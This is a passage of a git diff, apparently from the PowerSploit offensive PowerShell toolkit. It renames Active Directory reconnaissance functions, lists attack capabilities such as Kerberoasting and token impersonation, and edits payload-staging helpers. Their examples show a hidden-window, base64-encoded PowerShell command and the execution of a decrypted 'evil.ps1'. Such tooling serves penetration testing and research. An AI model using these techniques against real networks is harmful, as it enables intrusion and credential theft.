+Set-Alias Get-DNSRecord Get-DomainDNSRecord +Set-Alias Get-NetDomain Get-Domain +Set-Alias Get-NetDomainController Get-DomainController +Set-Alias Get-NetForest Get-Forest +Set-Alias Get-NetForestDomain Get-ForestDomain +Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog +Set-Alias Get-NetUser Get-DomainUser +Set-Alias Get-UserEvent Get-DomainUserEvent +Set-Alias Get-NetComputer Get-DomainComputer +Set-Alias Get-ADObject Get-DomainObject +Set-Alias Set-ADObject Set-DomainObject +Set-Alias Get-ObjectAcl Get-DomainObjectAcl +Set-Alias Add-ObjectAcl Add-DomainObjectAcl +Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl +Set-Alias Get-GUIDMap Get-DomainGUIDMap +Set-Alias Get-NetOU Get-DomainOU +Set-Alias Get-NetSite Get-DomainSite +Set-Alias Get-NetSubnet Get-DomainSubnet +Set-Alias Get-NetGroup Get-DomainGroup +Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup +Set-Alias Get-NetGroupMember Get-DomainGroupMember +Set-Alias Get-NetFileServer Get-DomainFileServer +Set-Alias Get-DFSshare Get-DomainDFSShare +Set-Alias Get-NetGPO Get-DomainGPO +Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup +Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping +Set-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMapping +Set-Alias Get-LoggedOnLocal Get-RegLoggedOn +Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess +Set-Alias Get-SiteName Get-NetComputerSiteName +Set-Alias Get-Proxy Get-WMIRegProxy +Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn +Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection +Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive +Set-Alias Get-NetProcess Get-WMIProcess +Set-Alias Invoke-ThreadedFunction New-ThreadedFunction +Set-Alias Invoke-UserHunter Find-DomainUserLocation +Set-Alias Invoke-ProcessHunter Find-DomainProcess +Set-Alias Invoke-EventHunter Find-DomainUserEvent +Set-Alias Invoke-ShareFinder Find-DomainShare +Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile +Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember +Set-Alias Get-NetDomainTrust Get-DomainTrust +Set-Alias Get-NetForestTrust Get-ForestTrust +Set-Alias Find-ForeignUser Get-DomainForeignUser +Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember +Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping +Set-Alias Get-DomainPolicy Get-DomainPolicyData diff --git a/Recon/README.md b/Recon/README.md index 6e28a302..7fcacc5e 100644 --- a/Recon/README.md +++ b/Recon/README.md @@ -34,96 +34,93 @@ an array of hosts from the pipeline. ### Misc Functions: Export-PowerViewCSV - thread-safe CSV append - Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit) - Copy-ClonedFile - copies a local file to a remote location, matching MAC properties - Get-IPAddress - resolves a hostname to an IP - Test-Server - tests connectivity to a specified server - Convert-NameToSid - converts a given user/group name to a security identifier (SID) - Convert-SidToName - converts a security identifier (SID) to a group/user name - Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format - Get-Proxy - enumerates local proxy settings + Resolve-IPAddress - resolves a hostname to an IP + ConvertTo-SID - converts a given user/group name to a security identifier (SID) + Convert-ADName - converts object names between a variety of formats + ConvertFrom-UACValue - converts a UAC int value to human readable form + Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object + Remove-RemoteConnection - destroys a connection created by New-RemoteConnection + Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token + Invoke-RevertToSelf - reverts any token impersonation + Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN) + Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion - Get-UserProperty - returns all properties specified for users, or a set of user:prop names - Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names - Find-InterestingFile - search a local or remote path for files with specific terms in the name - Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host - Get-DomainSearcher - builds a proper ADSI searcher object for a given domain - Get-ObjectAcl - returns the ACLs associated with a specific active directory object - Add-ObjectAcl - adds an ACL to a specified active directory object - Get-LastLoggedOn - return the last logged on user for a target host - Get-CachedRDPConnection - queries all saved RDP connection entries on a target host - Invoke-ACLScanner - enumerate -1000+ modifable ACLs on a specified domain - Get-GUIDMap - returns a hash table of current GUIDs -> display names - Get-DomainSID - return the SID for the specified domain - Invoke-ThreadedFunction - helper that wraps threaded invocation for other functions - - -### net * Functions: - Get-NetDomain - gets the name of the current user's domain - Get-NetForest - gets the forest associated with the current user's domain - Get-NetForestDomain - gets all domains for the current forest - Get-NetDomainController - gets the domain controllers for the current computer's domain - Get-NetUser - returns all user objects, or the user specified (wildcard specifiable) - Add-NetUser - adds a local or domain user - Get-NetComputer - gets a list of all current servers in the domain - Get-NetPrinter - gets an array of all current computers objects in a domain - Get-NetOU - gets data for domain organization units - Get-NetSite - gets current sites in a domain - Get-NetSubnet - gets registered subnets for a domain - Get-NetGroup - gets a list of all current groups in a domain - Get-NetGroupMember - gets a list of all current users in a specified domain group - Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts - Add-NetGroupUser - adds a local or domain user to a local or domain group - Get-NetFileServer - get a list of file servers used by current domain users - Get-DFSshare - gets a list of all distribute file system shares on a domain - Get-NetShare - gets share information for a specified server - Get-NetLoggedon - gets users actively logged onto a specified server - Get-NetSession - gets active sessions on a specified server - Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta) - Get-NetProcess - gets the remote processes and owners on a remote server - Get-UserEvent - returns logon or TGT events from the event log for a specified host - Get-ADObject - takes a domain SID and returns the user, group, or computer - object associated with it - Set-ADObject - takes a SID, name, or SamAccountName to query for a specified - domain object, and then sets a specified 'PropertyName' to a - specified 'PropertyValue' + + +### Domain/LDAP Functions: + Get-DomainDNSZone - enumerates the Active Directory DNS zones for a given domain + Get-DomainDNSRecord - enumerates the Active Directory DNS records for a given zone + Get-Domain - returns the domain object for the current (or specified) domain + Get-DomainController - return the domain controllers for the current (or specified) domain + Get-Forest - returns the forest object for the current (or specified) forest + Get-ForestDomain - return all domains for the current (or specified) forest + Get-ForestGlobalCatalog - return all global catalogs for the current (or specified) forest + Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set + Get-DomainUser - return all users or specific user objects in AD + New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object + Set-DomainUserPassword - sets the password for a given user identity and returns the user object + Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events + Get-DomainComputer - returns all computers or specific computer objects in AD + Get-DomainObject - returns all (or specified) domain objects in AD + Set-DomainObject - modifies a gven property for a specified active directory object + Get-DomainObjectAcl - returns the ACLs associated with a specific active directory object + Add-DomainObjectAcl - adds an ACL for a specific active directory object + Find-InterestingDomainAcl - finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects + Get-DomainOU - search for all organization units (OUs) or specific OU objects in AD + Get-DomainSite - search for all sites or specific site objects in AD + Get-DomainSubnet - search for all subnets or specific subnets objects in AD + Get-DomainSID - returns the SID for the current domain or the specified domain + Get-DomainGroup - return all groups or specific group objects in AD + New-DomainGroup - creates a new domain group (assuming appropriate permissions) and returns the group object + Get-DomainManagedSecurityGroup - returns all security groups in the current (or target) domain that have a manager set + Get-DomainGroupMember - return the members of a specific domain group + Add-DomainGroupMember - adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so + Get-DomainFileServer - returns a list of servers likely functioning as file servers + Get-DomainDFSShare - returns a list of all fault-tolerant distributed file systems for the current (or specified) domain ### GPO functions - Get-GptTmpl - parses a GptTmpl.inf to a custom object - Get-NetGPO - gets all current GPOs for a given domain - Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups" - on on target machines - Find-GPOLocation - takes a user/group and makes machines they have effective - rights over through GPO enumeration and correlation - Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it - through GPO enumeration - Get-DomainPolicy - returns the default domain or DC policy + Get-DomainGPO - returns all GPOs or specific GPO objects in AD + Get-DomainGPOLocalGroup - returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences + Get-DomainGPOUserLocalGroupMapping - enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation + Get-DomainGPOComputerLocalGroupMapping - takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation + Get-DomainPolicy - returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller -### User-Hunting Functions: - Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines - Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users - Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines - Invoke-UserEventHunter - hunts for user logon events in domain controller event logs +### Computer Enumeration Functions + + Get-NetLocalGroup - enumerates the local groups on the local (or remote) machine + Get-NetLocalGroupMember - enumerates members of a specific local group on the local (or remote) machine + Get-NetShare - returns open shares on the local (or a remote) machine + Get-NetLoggedon - returns users logged on the local (or a remote) machine + Get-NetSession - returns session information for the local (or a remote) machine + Get-RegLoggedOn - returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys + Get-NetRDPSession - returns remote desktop/session information for the local (or a remote) machine + Test-AdminAccess - rests if the current user has administrative access to the local (or a remote) machine + Get-NetComputerSiteName - returns the AD site where the local (or a remote) machine resides + Get-WMIRegProxy - enumerates the proxy server and WPAD conents for the current user + Get-WMIRegLastLoggedOn - returns the last user who logged onto the local (or a remote) machine + Get-WMIRegCachedRDPConnection - returns information about RDP connections outgoing from the local (or remote) machine + Get-WMIRegMountedDrive - returns information about saved network mounted drives for the local (or remote) machine + Get-WMIProcess - returns a list of processes and their owners on the local or remote machine + Find-InterestingFile - searches for files on the given path that match a series of specified criteria -### Domain Trust Functions: - Get-NetDomainTrust - gets all trusts for the current user's domain - Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain - Find-ForeignUser - enumerates users who are in groups outside of their principal domain - Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain - Invoke-MapDomainTrust - try to build a relational mapping of all domain trusts - - -### MetaFunctions: - Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain - Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain - Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to - Find-ManagedSecurityGroups - searches for active directory security groups which are managed and identify users who have write access to - - those groups (i.e. the ability to add or remove members) - Find-UserField - searches a user field for a particular term - Find-ComputerField - searches a computer field for a particular term - Get-ExploitableSystem - finds systems likely vulnerable to common exploits - Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain +### Threaded 'Meta'-Functions + + Find-DomainUserLocation - finds domain machines where specific users are logged into + Find-DomainProcess - finds domain machines where specific processes are currently running + Find-DomainUserEvent - finds logon events on the current (or remote domain) for the specified users + Find-DomainShare - finds reachable shares on domain machines + Find-InterestingDomainShareFile - searches for files matching specific criteria on readable shares in the domain + Find-LocalAdminAccess - finds machines on the local domain where the current user has local administrator access + Find-DomainLocalGroupMember - enumerates the members of specified local group on machines in the domain + + +### Domain Trust Functions: + Get-DomainTrust - returns all domain trusts for the current domain or a specified domain + Get-ForestTrust - returns all forest trusts for the current forest or a specified forest + Get-DomainForeignUser - enumerates users who are in groups outside of the user's domain + Get-DomainForeignGroupMember - enumerates groups with users outside of the group's domain and returns each foreign member + Get-DomainTrustMapping - this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index a1702182..d0a4148b 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -23,83 +23,85 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = @( - 'Add-NetGroupUser', - 'Add-NetUser', - 'Add-ObjectAcl', - 'Convert-NameToSid', - 'Convert-SidToName', + 'Export-PowerViewCSV', + 'Resolve-IPAddress', + 'ConvertTo-SID', + 'ConvertFrom-SID', 'Convert-ADName', 'ConvertFrom-UACValue', - 'Export-PowerViewCSV', - 'Find-ComputerField', - 'Find-ForeignGroup', - 'Find-ForeignUser', - 'Find-GPOComputerAdmin', - 'Find-GPOLocation', - 'Find-InterestingFile', - 'Find-LocalAdminAccess', - 'Find-ManagedSecurityGroups', - 'Find-UserField', - 'Get-ADObject', - 'Get-CachedRDPConnection', - 'Get-ComputerDetails', - 'Get-ComputerProperty', - 'Get-DFSshare', - 'Get-DNSRecord', - 'Get-DNSZone', - 'Get-DomainPolicy', + 'Add-RemoteConnection', + 'Remove-RemoteConnection', + 'Invoke-UserImpersonation', + 'Invoke-RevertToSelf', + 'Get-DomainSPNTicket', + 'Invoke-Kerberoast', + 'Get-PathAcl', + 'Get-DomainDNSZone', + 'Get-DomainDNSRecord', + 'Get-Domain', + 'Get-DomainController', + 'Get-Forest', + 'Get-ForestDomain', + 'Get-ForestGlobalCatalog', + 'Find-DomainObjectPropertyOutlier', + 'Get-DomainUser', + 'New-DomainUser', + 'Set-DomainUserPassword', + 'Get-DomainUserEvent', + 'Get-DomainComputer', + 'Get-DomainObject', + 'Set-DomainObject', + 'Set-DomainObjectOwner', + 'Get-DomainObjectAcl', + 'Add-DomainObjectAcl', + 'Find-InterestingDomainAcl', + 'Get-DomainOU', + 'Get-DomainSite', + 'Get-DomainSubnet', 'Get-DomainSID', - 'Get-ExploitableSystem', - 'Get-GUIDMap', - 'Get-HttpStatus', - 'Get-IPAddress', - 'Get-LastLoggedOn', - 'Get-LoggedOnLocal', - 'Get-NetComputer', - 'Get-NetDomain', - 'Get-NetDomainController', - 'Get-NetDomainTrust', - 'Get-NetFileServer', - 'Get-NetForest', - 'Get-NetForestCatalog', - 'Get-NetForestDomain', - 'Get-NetForestTrust', - 'Get-NetGPO', - 'Get-NetGPOGroup', - 'Get-NetGroup', - 'Get-NetGroupMember', + 'Get-DomainGroup', + 'New-DomainGroup', + 'Get-DomainManagedSecurityGroup', + 'Get-DomainGroupMember', + 'Add-DomainGroupMember', + 'Get-DomainFileServer', + 'Get-DomainDFSShare', + 'Get-DomainGPO', + 'Get-DomainGPOLocalGroup', + 'Get-DomainGPOUserLocalGroupMapping', + 'Get-DomainGPOComputerLocalGroupMapping', + 'Get-DomainPolicy', 'Get-NetLocalGroup', + 'Get-NetLocalGroupMember', + 'Get-NetShare', 'Get-NetLoggedon', - 'Get-NetOU', - 'Get-NetProcess', - 'Get-NetRDPSession', 'Get-NetSession', - 'Get-NetShare', - 'Get-NetSite', - 'Get-NetSubnet', - 'Get-NetUser', - 'Get-ObjectAcl', - 'Get-PathAcl', - 'Get-Proxy', - 'Get-RegistryMountedDrive', - 'Get-SiteName', - 'Get-UserEvent', - 'Get-UserProperty', - 'Invoke-ACLScanner', - 'Invoke-CheckLocalAdminAccess', - 'Invoke-DowngradeAccount', - 'Invoke-EnumerateLocalAdmin', - 'Invoke-EventHunter', - 'Invoke-FileFinder', - 'Invoke-MapDomainTrust', + 'Get-RegLoggedOn', + 'Get-NetRDPSession', + 'Test-AdminAccess', + 'Get-NetComputerSiteName', + 'Get-WMIRegProxy', + 'Get-WMIRegLastLoggedOn', + 'Get-WMIRegCachedRDPConnection', + 'Get-WMIRegMountedDrive', + 'Get-WMIProcess', + 'Find-InterestingFile', + 'Find-DomainUserLocation', + 'Find-DomainProcess', + 'Find-DomainUserEvent', + 'Find-DomainShare', + 'Find-InterestingDomainShareFile', + 'Find-LocalAdminAccess', + 'Find-DomainLocalGroupMember', + 'Get-DomainTrust', + 'Get-ForestTrust', + 'Get-DomainForeignUser', + 'Get-DomainForeignGroupMember', + 'Get-DomainTrustMapping', + 'Get-ComputerDetail', + 'Get-HttpStatus', 'Invoke-Portscan', - 'Invoke-ProcessHunter', - 'Invoke-ReverseDnsLookup', - 'Invoke-ShareFinder', - 'Invoke-UserHunter', - 'New-GPOImmediateTask', - 'Request-SPNTicket', - 'Set-ADObject' + 'Invoke-ReverseDnsLookup' ) # List of all files packaged with this module diff --git a/ScriptModification/Out-CompressedDll.ps1 b/ScriptModification/Out-CompressedDll.ps1 index 5e6897d9..86089564 100644 --- a/ScriptModification/Out-CompressedDll.ps1 +++ b/ScriptModification/Out-CompressedDll.ps1 @@ -5,12 +5,12 @@ function Out-CompressedDll Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. -PowerSploit Function: Out-CompressedDll -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Out-CompressedDll +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. @@ -21,7 +21,7 @@ Specifies the path to a managed executable. .EXAMPLE -C:\PS> Out-CompressedDll -FilePath evil.dll +Out-CompressedDll -FilePath evil.dll Description ----------- @@ -36,7 +36,9 @@ Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( [Parameter(Mandatory = $True)] [String] $FilePath @@ -51,7 +53,7 @@ http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html $FileBytes = [System.IO.File]::ReadAllBytes($Path) - if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ') + if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ') { Throw "$Path is not a valid executable." } diff --git a/ScriptModification/Out-EncodedCommand.ps1 b/ScriptModification/Out-EncodedCommand.ps1 index 04e8c12d..6f21391c 100644 --- a/ScriptModification/Out-EncodedCommand.ps1 +++ b/ScriptModification/Out-EncodedCommand.ps1 @@ -5,12 +5,12 @@ function Out-EncodedCommand Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. -PowerSploit Function: Out-EncodedCommand -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Out-EncodedCommand +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies. @@ -49,13 +49,13 @@ Base-64 encodes the entirety of the output. This is usually unnecessary and effe .EXAMPLE -C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'} +Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'} powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd() .EXAMPLE -C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput +Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA= @@ -72,7 +72,8 @@ This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kenn http://www.exploit-monday.com #> - [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( + [CmdletBinding( DefaultParameterSetName = 'FilePath')] + Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] [ValidateNotNullOrEmpty()] [ScriptBlock] diff --git a/ScriptModification/Out-EncryptedScript.ps1 b/ScriptModification/Out-EncryptedScript.ps1 index eba48f7e..c24b1267 100644 --- a/ScriptModification/Out-EncryptedScript.ps1 +++ b/ScriptModification/Out-EncryptedScript.ps1 @@ -5,11 +5,11 @@ function Out-EncryptedScript Encrypts text files/scripts. -PowerSploit Function: Out-EncryptedScript -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Out-EncryptedScript +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -36,7 +36,8 @@ is randomly generated by default. .EXAMPLE -C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty +$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Out-EncryptedScript .\Naughty-Script.ps1 $Password salty Description ----------- @@ -48,10 +49,10 @@ function 'de' and the base64-encoded ciphertext. .EXAMPLE -C:\PS> [String] $cmd = Get-Content .\evil.ps1 -C:\PS> Invoke-Expression $cmd -C:\PS> $decrypted = de password salt -C:\PS> Invoke-Expression $decrypted +[String] $cmd = Get-Content .\evil.ps1 +Invoke-Expression $cmd +$decrypted = de password salt +Invoke-Expression $decrypted Description ----------- @@ -64,34 +65,39 @@ unencrypted script is called via Invoke-Expression This command can be used to encrypt any text-based file/script #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $ScriptPath, - + [Parameter(Position = 1, Mandatory = $True)] - [String] + [Security.SecureString] $Password, - + [Parameter(Position = 2, Mandatory = $True)] [String] $Salt, - + [Parameter(Position = 3)] [ValidateLength(16, 16)] [String] - $InitializationVector = ((1..16 | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''), - + $InitializationVector = ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''), + [Parameter(Position = 4)] [String] $FilePath = '.\evil.ps1' ) + $TempCred = New-Object System.Management.Automation.PSCredential('a', $Password) + $PlaintextPassword = $TempCred.GetNetworkCredential().Password + $AsciiEncoder = New-Object System.Text.ASCIIEncoding $ivBytes = $AsciiEncoder.GetBytes($InitializationVector) # While this can be used to encrypt any file, it's primarily designed to encrypt itself. [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath - $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2) + $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($PlaintextPassword, $AsciiEncoder.GetBytes($Salt), "SHA1", 2) $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16) diff --git a/ScriptModification/Remove-Comments.ps1 b/ScriptModification/Remove-Comment.ps1 similarity index 80% rename from ScriptModification/Remove-Comments.ps1 rename to ScriptModification/Remove-Comment.ps1 index 45a97464..61944198 100644 --- a/ScriptModification/Remove-Comments.ps1 +++ b/ScriptModification/Remove-Comment.ps1 @@ -1,19 +1,19 @@ -function Remove-Comments +function Remove-Comment { <# .SYNOPSIS Strips comments and extra whitespace from a script. -PowerSploit Function: Remove-Comments -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Remove-Comment +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION -Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. +Remove-Comment strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee! @@ -27,11 +27,11 @@ Specifies the path to your script. .EXAMPLE -C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1 +$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1 .EXAMPLE -C:\PS> Remove-Comments -ScriptBlock { +Remove-Comment -ScriptBlock { ### This is my awesome script. My documentation is beyond reproach! Write-Host 'Hello, World!' ### Write 'Hello, World' to the host ### End script awesomeness @@ -41,7 +41,7 @@ Write-Host 'Hello, World!' .EXAMPLE -C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand +Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand Description ----------- @@ -57,15 +57,17 @@ Accepts either a string containing the path to a script or a scriptblock. System.Management.Automation.ScriptBlock -Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. +Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. .LINK http://www.exploit-monday.com http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/ #> - - [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param ( + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding( DefaultParameterSetName = 'FilePath' )] + Param ( [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )] [ValidateNotNullOrEmpty()] [String] diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1 index 923c8749..07cd0bfa 100644 --- a/ScriptModification/ScriptModification.psd1 +++ b/ScriptModification/ScriptModification.psd1 @@ -26,6 +26,6 @@ FunctionsToExport = '*' # List of all files packaged with this module FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', - 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md' + 'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md' } diff --git a/Tests/Privesc.tests.ps1 b/Tests/Privesc.tests.ps1 index 9b9872b9..b8435314 100644 --- a/Tests/Privesc.tests.ps1 +++ b/Tests/Privesc.tests.ps1 @@ -126,40 +126,142 @@ Describe 'Get-ModifiablePath' { } } -Describe 'Get-CurrentUserTokenGroupSid' { - if(-not $(Test-IsAdmin)) { - Throw "'Get-CurrentUserTokenGroupSid' Pester test needs local administrator privileges." +Describe 'Get-ProcessTokenGroup' { + + if (-not $(Test-IsAdmin)) { + Throw "'Get-ProcessTokenGroup' Pester test needs local administrator privileges." } It 'Should not throw.' { - {Get-CurrentUserTokenGroupSid} | Should Not Throw + {Get-ProcessTokenGroup} | Should Not Throw } - It 'Should return SIDs and Attributes.' { - $Output = Get-CurrentUserTokenGroupSid | Select-Object -First 1 + It 'Should return SID, Attribute, and ProcessID.' { + $Output = Get-ProcessTokenGroup | Select-Object -First 1 if ($Output.PSObject.Properties.Name -notcontains 'SID') { - Throw "Get-CurrentUserTokenGroupSid result doesn't contain 'SID' field." + Throw "Get-ProcessTokenGroup result doesn't contain 'SID' field." } if ($Output.PSObject.Properties.Name -notcontains 'Attributes') { - Throw "Get-CurrentUserTokenGroupSid result doesn't contain 'Attributes' field." + Throw "Get-ProcessTokenGroup result doesn't contain 'Attributes' field." + } + + if ($Output.PSObject.Properties.Name -notcontains 'ProcessID') { + Throw "Get-ProcessTokenGroup result doesn't contain 'ProcessID' field." + } + } + + It 'Should accept a process object on the pipeline.' { + $Output = Get-Process -Id $PID | Get-ProcessTokenGroup | Select-Object -First 1 + $Output | Should Not BeNullOrEmpty + } + + It 'Should accept multiple process objects on the pipeline.' { + $Output = @($(Get-Process -Id $PID), $(Get-Process -Id $PID)) | Get-ProcessTokenGroup | Where-Object {$_.SID -match 'S-1-5-32-544'} + if 